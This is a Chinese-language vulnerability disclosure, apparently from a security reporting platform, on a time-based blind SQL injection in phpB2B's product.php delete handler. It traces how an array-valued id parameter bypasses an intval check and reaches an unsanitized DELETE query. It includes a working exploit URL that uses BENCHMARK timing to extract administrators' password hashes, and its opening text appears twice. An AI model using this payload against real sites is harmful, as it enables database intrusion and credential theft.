### 简要描述: phpB2B延迟盲注,可以获取管理员的hash值 ### 详细说明: 测试版本: 0415更新版 测试权限: 需要注册会员 测试详细: product.php ``` 大概在69行时,判断$id为整形,后续有调用$_GET[‘id’],执行删除操作,导致了sql注入。 if (isset($_GET['do']) || isset($_GET['act'])) { $do = trim($_GET['do']); $action = null; if(isset($_GET['action'])) $action = trim($_GET['action']); if (isset($_GET['id'])) { $id = intval($_GET['id']); } ..... if (($do == "del" || $_GET['act']=="del") && !empty($id)) { $res = $product->read("id",$id); if($res){ if(!$product->del($_GET['id'], $conditions)){ flash(); } }else { flash("data_not_exists");; } } } ``` 跟着del ``` function del($ids, $conditions = null, $table = null) { $del_id = $this->primaryKey; $tmp_ids = $condition = null; if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } if (!empty($table)) { $table_name = $this->table_prefix.$table; }else{ $table_name = $this->getTable(); }...
### 简要描述: phpB2B延迟盲注,可以获取管理员的hash值 ### 详细说明: 测试版本: 0415更新版 测试权限: 需要注册会员 测试详细: product.php ``` 大概在69行时,判断$id为整形,后续有调用$_GET[‘id’],执行删除操作,导致了sql注入。 if (isset($_GET['do']) || isset($_GET['act'])) { $do = trim($_GET['do']); $action = null; if(isset($_GET['action'])) $action = trim($_GET['action']); if (isset($_GET['id'])) { $id = intval($_GET['id']); } ..... if (($do == "del" || $_GET['act']=="del") && !empty($id)) { $res = $product->read("id",$id); if($res){ if(!$product->del($_GET['id'], $conditions)){ flash(); } }else { flash("data_not_exists");; } } } ``` 跟着del ``` function del($ids, $conditions = null, $table = null) { $del_id = $this->primaryKey; $tmp_ids = $condition = null; if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } if (!empty($table)) { $table_name = $this->table_prefix.$table; }else{ $table_name = $this->getTable(); } if(!empty($conditions)) { if(is_array($conditions)) { $tmp_where_cond = implode(" AND ", $conditions); $cond[] = $tmp_where_cond; } else { $cond[] = $conditions; } } $this->setCondition($cond); $sql = "DELETE FROM ".$table_name.$this->getCondition(); echo $sql;exit; $deleted = $this->dbstuff->Execute($sql); unset($this->condition); return $deleted; } ``` 延迟注入exp: http://200.200.87.150:873/virtual-office/product.php?do=del&id[]=5) and 1=(CASE WHEN (select ascii(substring(userpass,1,1)) from pb_2cw_members limit 1)=49 THEN BENCHMARK(10000000,SHA1(123)) ELSE 2 END)%23 post参数: id=123 注意事项: 盲注的时候,有个小小的局限,那么就是产品的数据库中product表内 id字段必须要有为1的,否则不行; 所以在盲注的时候,最好需要删除不成功,sql语句做一些处理即可。 ### 漏洞证明: 查看后台mysql日志,或页面响应时间,都可以得到证明: [<img src="https://images.seebug.org/upload/201404/24085347f878dd847cb3941645910a98bc3f4e5f.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/24085347f878dd847cb3941645910a98bc3f4e5f.png)
